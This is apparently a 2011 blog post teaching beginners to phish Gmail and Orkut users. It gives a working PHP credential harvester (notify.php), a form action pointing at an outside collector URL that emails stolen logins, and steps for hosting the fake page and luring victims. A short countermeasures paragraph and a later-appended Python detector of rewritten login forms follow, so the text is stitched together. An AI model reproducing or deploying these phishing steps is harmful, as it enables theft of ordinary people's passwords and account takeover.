Thursday, July 21, 2011

Phishing (Basic Level)

What is Phishing?

Phishing is a technique to obtain a password, username or any sensitive information, such as credit card details, using a fake page which pretends to be a real one.


How to perform the attack?

Method-1: Directing the username and password to your email ID

1. First, you need to create a fake login page. So, how to do it?
Example: open gmail.com in your browser. On the login page, right-click and save the page.

2. You must know basic HTML to understand this step: the form in the HTML code has an "ACTION" keyword, whose task is to send the details entered on the page to a handler (script). What we have to do is change the value of that "ACTION" in the form. Let's see how to do it.
Example: open the saved login page (gmail.com in our example) with Notepad -> press "Ctrl+F" (find mode) -> type the "action" keyword to find it.
Now that you have located "action", change the code: replace what is inside the two double quotes immediately after it with:
"http://kyrion.in/download/adjgtr.phpid=example@gmail.com&link=gmail.com"
Replace "example@gmail.com" with your email ID.
Note: the "link" in the above URL is used to direct the page back to gmail.com; you can change it as per your need.

3. Now try logging in and check whether you are getting the email or not. If everything is working, it's time to upload these login pages. To do so, choose any free web hosting site (e.g. my3gb.com): create an account, go to the file manager and upload all the files and folders which you have saved.

4. Now give the link (say: username.my3gb.com/gmail.html) of your fake login page to the victim through email or any other way. Now it's up to you how to make your victim log in through your fake page (use your head).





Method-2: Storing the username and password in a txt file (uploaded to the website)

1. First, you need to create a fake login page. So, how to do it?
Example: open orkut.com in your browser. On the login page, right-click and save the page.

2. Now create a notify.php file (copy and paste the code below and save it with the name notify.php).



notify.php
<?php
header ('Location:http://www.orkut.com ');
$file = fopen("store.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>



3. Now create an empty store.txt file.

4. Open the login page saved earlier with Notepad and find the word "action" (hint: press "Ctrl+F"). Change the value of action (inside the two double quotes immediately after it) to "notify.php",
i.e. after submission the login form will be handled by notify.php, which will then redirect the page to orkut.com. Check the header section of the PHP code; you can change it as per your need.









5. Upload all files (the fake login page with its folder, notify.php and store.txt) to my3gb.com (or any free hosting site).

6. Serve your fake login page link to the victim. Once the victim logs in through your page, the login details will be stored in "store.txt", so don't forget to check the store.txt file.


Countermeasures:

The only possible countermeasure is simply not to enter confidential data without checking the URL of the website. There are some other phishing attacks in which the URL can be spoofed, so it is better to check the certificate of the website as well.
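Both methods above leave the same trace in the page itself: the password form's "action" no longer points at the real service. The following is an added defensive example, not part of the original post, that goes one step beyond checking the address bar by resolving each credential form's action and flagging any that leaves a trusted host; the trusted-host set, the sample pages and the `.example` host names are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: the only host that should ever receive this brand's credentials.
TRUSTED_HOSTS = {"accounts.google.com"}

class LoginFormAudit(HTMLParser):
    """Collect the action of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self._action = None   # action of the form currently open, else None
        self._has_pw = False
        self.actions = []

    def _flush(self):
        # Record the open form if it held a password field, then reset.
        if self._action is not None and self._has_pw:
            self.actions.append(self._action)
        self._action, self._has_pw = None, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._flush()     # tolerate a previous form that was never closed
            self._action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self._has_pw = self._action is not None

    def handle_endtag(self, tag):
        if tag == "form":
            self._flush()

def audit_page(page_url, html, trusted=TRUSTED_HOSTS):
    """Return (resolved_action, reason) for each credential form that fails."""
    parser = LoginFormAudit()
    parser.feed(html)
    parser.close()
    parser._flush()           # form still open at end of document
    findings = []
    for action in parser.actions:
        target = urljoin(page_url, action)  # relative action -> hosting site
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
        if host not in trusted:
            findings.append((target, "credentials sent to untrusted host " + host))
        elif parts.scheme != "https":
            findings.append((target, "credentials sent over " + parts.scheme))
    return findings

# Constructed samples: a saved copy with a rewritten action, and a genuine form.
CLONE = ('<form action="notify.php" method="post"><input name="Email">'
         '<input type="password" name="Passwd"></form>')
GENUINE = ('<form action="https://accounts.google.com/signin" method="post">'
           '<input type="password" name="Passwd"></form>')
```

Run over pages fetched by a mail gateway or URL sandbox, a non-empty result from `audit_page` is a signal to block or report the link.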
